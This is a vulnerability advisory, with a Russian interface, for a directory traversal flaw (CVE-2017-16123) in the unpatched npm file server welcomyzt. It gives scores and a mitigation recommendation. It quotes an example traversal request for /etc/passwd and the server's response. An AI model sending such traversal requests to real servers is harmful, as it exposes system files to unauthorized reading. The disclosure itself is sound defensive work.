GHSA-8fv7-vm2p-5495

Опубликовано: 01 сент. 2020

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Directory Traversal in welcomyzt

welcomyzt is a simple file server.

welcomyzt is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing ../ in the url.

Example request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1 host: localhost

and server Response:

HTTP/1.1 200 OK Date: Thu, 04 May 2017 23:59:18 GMT Connection: keep-alive Transfer-Encoding: chunked {contents of /etc/passwd}

Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

Ссылки

Пакеты

Наименование

welcomyzt

npm

Затронутые версииВерсия исправления

>= 0.0.0

Отсутствует

EPSS

Процентиль: 69%

0.00596

Низкий

7.5 High

CVSS3

CVE ID

CVE-2017-16123

Дефекты

CWE-22

Связанные уязвимости

CVE-2017-16123

CVSS3: 7.5

nvd

больше 7 лет назад

welcomyzt is a simple file server. welcomyzt is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.

EPSS

Процентиль: 69%

0.00596

Низкий

7.5 High

CVSS3

CVE ID

CVE-2017-16123

Дефекты

CWE-22